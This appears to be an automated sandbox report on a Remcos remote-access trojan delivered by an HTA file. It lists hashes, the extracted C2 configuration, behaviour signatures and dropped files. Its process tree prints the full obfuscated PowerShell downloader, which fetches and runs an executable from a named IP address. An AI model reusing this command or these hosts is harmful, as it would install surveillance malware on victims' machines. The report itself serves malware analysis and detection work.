Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    17-12-2024 03:13

General

  • Target

    6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470.hta

  • Size

    142KB

  • MD5

    22ca9f87ffb6d9d3dc9d7e4f151470c7

  • SHA1

    df9bcef5ab55d8a5342bb7747d7936f4fe20afe7

  • SHA256

    6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470

  • SHA512

    e4949a19b36fff2946b507911f39f587dd5db088a453292e3e24a4c4510c39e9e8d7dc3c32281b22586a5e29d46f58a68201e9ed721dead80f2fcdd96048f9a2

  • SSDEEP

    768:t1EiK3jK+yum2oum2U+5KUJDVUKhC14GVf/AtK36zyYnhH+K7TwTxKe+uvYcWqkO:tn

Malware Config

Extracted

Family

remcos

Botnet

elvis

C2

107.173.4.16:2560

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GJDISH

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1948
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9nbkubh7.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2724
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC68B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC68A.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2836
        • C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
          "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
          4⤵
          • Executes dropped EXE
          PID:2832

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\9nbkubh7.dll

    Filesize

    3KB

    MD5

    8110369b4913d58f30a9030194c940a9

    SHA1

    2779cbcc810e1c9131b6719623413e94003783af

    SHA256

    e52e6c7fe5ca62bbc133701402d74056bdefbfa9c1482ea208d85d239ffd5764

    SHA512

    a3400402f87b690a1705d0e3e7b1415fb8cf5118be10831fdfa999f9950db9fe02c04ace316a6b05d8589f46ad9dd67df15ab4d68cc7f3fc772c5702ef7f2ba2

  • C:\Users\Admin\AppData\Local\Temp\9nbkubh7.pdb

    Filesize

    7KB

    MD5

    623b34b0b11542173d7afacc1f245194

    SHA1

    d78e417fa305d8b4c8ec34f7916dd5eabed6bca9

    SHA256

    05f3834f9bdd0125f4a88b297e66f6d005dd843bb41c816ddb5dbf682664d360

    SHA512

    cd51afe2825eb936bd54b1ecf198e54c362683dc849e04186ecd4bae3dafbc88cba2d930fdf9a6dd8cb6dc4e759ec748c2dc514e181d85eee1fa8e13cc180d7f

  • C:\Users\Admin\AppData\Local\Temp\RESC68B.tmp

    Filesize

    1KB

    MD5

    1d1077f4fe6effcd680e9469bc69297c

    SHA1

    243294c27f012751b2046bca693566fa6ccb7c09

    SHA256

    84dba55adb984305279022808c924e0728979d7c1b0500bfc3a5dbcb75150b67

    SHA512

    4d53c3a42e68257d6fe032e415ff4ca60257b62e467c67ca7619c78995df796ca9b6ba5301cef22d64446e22965538f1545072edb2c2b9096403d58fd0bd652a

  • \??\c:\Users\Admin\AppData\Local\Temp\9nbkubh7.0.cs

    Filesize

    478B

    MD5

    80c03b4485808d996cc8226157f377a7

    SHA1

    7cc7e02b84232b1523c555a349c86fc059a98eff

    SHA256

    240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d

    SHA512

    ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c

  • \??\c:\Users\Admin\AppData\Local\Temp\9nbkubh7.cmdline

    Filesize

    309B

    MD5

    aee07cca87aa1776ace9f469ad15a73d

    SHA1

    7d7b93792051018aea6c00d4ee17f2b4b6c5f428

    SHA256

    3d8dcbd6494604eaa16b0f77c4fd7397731a864acd73827646f66476962de650

    SHA512

    83306f22068685877104e291e1ac9fab4ae39d7159bd274b62c85f9636bf615628da7015231da1ab2d792772f36575d3a3846e89124e465755f83b2dafa9c33f

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCC68A.tmp

    Filesize

    652B

    MD5

    8456482394366df9e37a3d3751b53fbe

    SHA1

    c4493efa4a4488f4899642f40fb5486789e4bb3a

    SHA256

    792bc9d88e1ad5d6435b2798268660563efd16203dca9579dc61fe98f7eaf3ee

    SHA512

    b0c337636bfc446b7d14120e01447afdd217edc9891c7104106501156cdd4c6d31687afeaf3309a71d902d8167bfb41d85e1afbc6b44daeb720889b736c66c14

  • \Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

    Filesize

    530KB

    MD5

    c6b0fba610732719435d9621878bc605

    SHA1

    789afce0b2016029215db7cca0ce7c4acfa54b4c

    SHA256

    ce59b68d157e34b9608b9535441963aaef11068cae3b75a3646238f25b74b92d

    SHA512

    5d67d7e0fec12d7f03053d809f614263c6af7b3d54ed794632ee9024895b3c607ebcabd81a2d6202d280968c4df1ef9bd3699675416a67936345f8622c206933

  • memory/2832-35-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-39-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-34-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-32-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-36-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-37-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-38-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-33-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-40-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-41-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-42-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-43-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-44-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-45-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB